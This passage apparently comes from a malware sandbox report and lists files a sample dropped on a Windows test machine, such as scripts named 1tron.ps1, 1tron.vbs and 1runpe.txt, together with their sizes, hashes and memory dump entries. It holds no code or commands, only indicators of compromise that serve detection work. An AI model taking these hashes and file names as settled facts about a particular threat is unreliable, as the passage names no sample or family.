                                                              d5991a058e1ec54e73523d91b1827254c389818e2a5ed743c440752113a9d2c3

                                                              SHA512

                                                              227d187ab6d720d95b712253d5e3bc9a3b2aa9091cc2277052b99ea17436c316b52f3b8c99b8e29e4e07f3705bf35ef48825703f1d4925f0a8359b84311f6ac0

                                                              Download Submit

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                              Filesize

                                                              1KB

                                                              MD5

                                                              c6a2510914019befbf17ec9a5c78d1da

                                                              SHA1

                                                              98bd84d3c26f7b225c9143be91a99527bb7898c7

                                                              SHA256

                                                              407b2efbce82df5431077d69680c2be13279df0c8ac6ee6132f91ec7ea39ff1d

                                                              SHA512

                                                              e14a0d72ef94200a4be94330e70f1733ca68fe9ca296ce011d4874c231539e81f8a1cb170079f6b8cbc48f7a3e18f606e2c5eb297cfd003c0c3d40f421dd9d18

                                                              Download Submit

                                                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1fvk5sha.uz1.ps1
                                                              Filesize

                                                              60B

                                                              MD5

                                                              d17fe0a3f47be24a6453e9ef58c94641

                                                              SHA1

                                                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                              SHA256

                                                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                              SHA512

                                                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                              Download Submit

                                                            • C:\Users\Admin\AppData\Roaming\teste.ps1
                                                              Filesize

                                                              2KB

                                                              MD5

                                                              c21637b9e2d6ec2b3dd5cda415162a94

                                                              SHA1

                                                              5ab06877ca476f46947470a0e6ae9e9f41ab02a8

                                                              SHA256

                                                              038e084292c784214222c2221ab9a3982f226ad8f7bd447953aae74086d2d9dc

                                                              SHA512

                                                              2fdcc701084e611665a6c1abd6a1323cf9d12216b44031fccd38d5f6c5a33a8a621bf4f4dc0f7b4b0dfd01fd98061eb27561de66def4dd798874603eb9fa3881

                                                              Download Submit

                                                            • C:\Users\Admin\Downloads\Unconfirmed 791307.crdownload
                                                              Filesize

                                                              7KB

                                                              MD5

                                                              7ead38810eed6f79f830e70d5bddf819

                                                              SHA1

                                                              00b53b6ec76934051615b4bbfb283790667660c6

                                                              SHA256

                                                              4040c9bd03342612b4ea181bed1ace7bdcbe704d749286932e1063c8373c06bd

                                                              SHA512

                                                              b79830a95a4ac6aa4caa120368091096d1ee3166fa4d259106c86740d00d0e5220a33c5ce434fcebef439d51004d1e3495ea404348ec2a0d762bd1d06f15aa85

                                                              Download Submit

                                                            • C:\Users\Public\1Execute.txt
                                                              Filesize

                                                              56B

                                                              MD5

                                                              529cf04db0f736467c7583ea80c3aa66

                                                              SHA1

                                                              7628148337b1d3d700c8151f76a1595b6f5123b8

                                                              SHA256

                                                              67642e56281bc4aa846689bc725f8fcc76e61c20831aa4f7e2e0c8cdba17e520

                                                              SHA512

                                                              f612b12e1a7c2021f6c2723fe57f23aba3d1b6588f080dd67e48dc44eeaf88455e4bc6bf9caed088c63c3fb019ad8696eeb44e7bb09f8c81638779f4658ef6d4

                                                              Download Submit

                                                            • C:\Users\Public\1Framework.txt
                                                              Filesize

                                                              544B

                                                              MD5

                                                              af4d21f7d77e8a1bc4f82a834309ad0a

                                                              SHA1

                                                              caf541c4ac263ee927894d3f03f1a532c253338e

                                                              SHA256

                                                              149698fea0657620e3972ab9fa450a868727c6da1199e3706c4f1c98dfdd9ffc

                                                              SHA512

                                                              156625f91a117b75aff983fd4e71c2a049bf7d2ae64b9a4bec338214f58de4d27097f4ae3b71c123726d310ade27cb083844f7960553b0f04864a4ada903af12

                                                              Download Submit

                                                            • C:\Users\Public\1invoke.txt
                                                              Filesize

                                                              6B

                                                              MD5

                                                              b9376e9e3c4d48f5e35a3f355ae1f74a

                                                              SHA1

                                                              c65605adf5270f5065089b0189da542274d30db0

                                                              SHA256

                                                              90092e5fb861dd4ff34fa20f4b31ca44ebbb3bc367a8d7a35b89a7f89c793fa9

                                                              SHA512

                                                              5560101edb289c4a86476bce55648324ef188ff1e2d879a1a3bc10c1298aa643255c35d16a984f30d624fe9a87306304eaa14179863001ddd6e264e8bba17591

                                                              Download Submit

                                                            • C:\Users\Public\1load.txt
                                                              Filesize

                                                              4B

                                                              MD5

                                                              f19dbf2edb3a0bd74b0524d960ff21eb

                                                              SHA1

                                                              ddcb77ff769ea54ca622848f6bedd4004fa4f4fa

                                                              SHA256

                                                              8a6bdb6b18da586fe7f2acbd8f1055533f2cd97a3681b3652bcd712224df45c3

                                                              SHA512

                                                              f0419117db6330f52eba6e7ef08a5cb096fdb02a40b1dfe4f28dd57791a11b6753e4db0fb63e1c4a22293584dc61908a8e2e99dc59a07f805e097c723329d216

                                                              Download Submit

                                                            • C:\Users\Public\1method.txt
                                                              Filesize

                                                              9B

                                                              MD5

                                                              38b97710070dbdd7b3359c0d52da4a72

                                                              SHA1

                                                              4ce08d2147c514f9c8e1f83d384369ec8986bc3b

                                                              SHA256

                                                              675f06af4e7f254d55ac605bbd7da45d9e00207a97f8a8ab7bb747d512776bc7

                                                              SHA512

                                                              b11cec0f21dec871163d6c254850d3f807ecc4ae726b143a0c4667a25c3a3fe9283aee3f6850a2389fdce3d20f41d9c3d30f4768171137d6bdc1355a2116189c

                                                              Download Submit

                                                            • C:\Users\Public\1msg.txt
                                                              Filesize

                                                              262KB

                                                              MD5

                                                              575978b2cf6df828003eba284fc66c6f

                                                              SHA1

                                                              0aba5d5d65db8d03ce8a1e815d4c58d6e837ab86

                                                              SHA256

                                                              be63529b873f639f4fbef5df6d1c63bc5d2ee67eb58b34168a180d95c39e36b9

                                                              SHA512

                                                              1cbe9b926856da301985412f335814c40c82491b8a6193cf8a7c8e49b6b60279e876aa45aca1a90338c163e0f21ae2e14ba739e5dff61561e60cabf3c2eb6592

                                                              Download Submit

                                                            • C:\Users\Public\1runpe.txt
                                                              Filesize

                                                              504KB

                                                              MD5

                                                              37c7338fc0dee2431f17c13e6d63ca7d

                                                              SHA1

                                                              5fd56e0b30e804985ec6369cca921aa57c1b9387

                                                              SHA256

                                                              d7fae721570c9ac29543def534f2b8bcaab602e78bde187855e97ca100abb799

                                                              SHA512

                                                              1dd9ebc7a7884b5c9d73dae351b3d58a82588f44e5861a358a4510fd80e8613719cef5ab2affe5d256eac697e359a7f2c952f89aea94b93692113da78876e8fe

                                                              Download Submit

                                                            • C:\Users\Public\1tron.bat
                                                              Filesize

                                                              353B

                                                              MD5

                                                              9a545fc5cb413a30926dd0bf582d15ca

                                                              SHA1

                                                              fdfc0f80549c143ea3d4e43f88a62aafab44c5d5

                                                              SHA256

                                                              d9890171baa042bc421dbbfd81966149450f95cd62c5914e69a5cc8447f0ea90

                                                              SHA512

                                                              cb302b1604064422f8cdf5f21dfd8068084ecf7550c1f8876c457b5c70d049abe8b4b5700873133b9ae6ddace112a45eac138c884e19c8542f8cd53493be3a82

                                                              Download Submit

                                                            • C:\Users\Public\1tron.ps1
                                                              Filesize

                                                              18KB

                                                              MD5

                                                              8731013ddd5c663883a790919bc451c9

                                                              SHA1

                                                              5a906d7909abf13b1729f4a7a6888eb9a6db9ccf

                                                              SHA256

                                                              b5a8e162611a622ad15e1ee76bed5ca3b1782df930a0eab4ed7bbd3c6f199395

                                                              SHA512

                                                              603c4867bb5322e9fe2fb46cadff51f4c69e2f3b8423d87f1026e59e79a833c4d12c355b836c7826d64b185c8f9b0e4a71a8651f4c216bcf69d0fe1f19a7f049

                                                              Download Submit

                                                            • C:\Users\Public\1tron.vbs
                                                              Filesize

                                                              634B

                                                              MD5

                                                              6c65594250feb96fd67eaa06a62d042f

                                                              SHA1

                                                              5d84dd761e849ca60bb8e8d8aea73ad812ce60a2

                                                              SHA256

                                                              f16ae3a7db434bac6d5bb907fe23dc674871ffafd22075afc0eabcf94c8347f8

                                                              SHA512

                                                              fc2dfd95012c9a2182778878d7a470c37bd9300b76b499d6bc4a2bc121c0065a9c59e4c65be8aec43239d3bbc2169f8f35c35bf6e122dea5f82a9a78cdefc365

                                                              Download Submit

                                                            • C:\Users\Public\1type.txt
                                                              Filesize

                                                              7B

                                                              MD5

                                                              be784e48d0174367297b636456c7bcf1

                                                              SHA1

                                                              8c906d9e0e2439238b3263e087aee3d98fa86dea

                                                              SHA256

                                                              510760f4c6f7fb3b5b332cd7d3a2f674235b0f58d77dbc3972adaf682a168136

                                                              SHA512

                                                              aed58d8904742a672f9ba339069004a1c0339e6481a8949de14ee8bf2afef43f8e18e55ba4a6854a7950ee355675c26b46120e500472deaf0986f68451442ae4

                                                              Download Submit

                                                            • C:\Users\Public\1xx.txt
                                                              Filesize

                                                              72B

                                                              MD5

                                                              14c2a6b7bf15e15d8dae9cd4a56432d5

                                                              SHA1

                                                              0d00aa5d547ea7e6f7283221e5f3b0cc91cc6016

                                                              SHA256

                                                              79891821778c4ca9358c27e7fb66b0442a2921b661df1293e398b18d81da5d96

                                                              SHA512

                                                              e476851faf540c3679225de2b224d64d117fa1857a4db7b34714d0154b8ba5ebaab50e1a6b0578759b7572e89e3df4d0d4112a7e4f5b81230931cfe6b651c63d

                                                              Download Submit

                                                            • memory/4528-177-0x000001FDCBF30000-0x000001FDCBF52000-memory.dmp

                                                              Filesize

                                                              136KB

                                                              Download

                                                            • memory/5072-346-0x00000219C6A90000-0x00000219C6AD6000-memory.dmp

                                                              Filesize

                                                              280KB

                                                              Download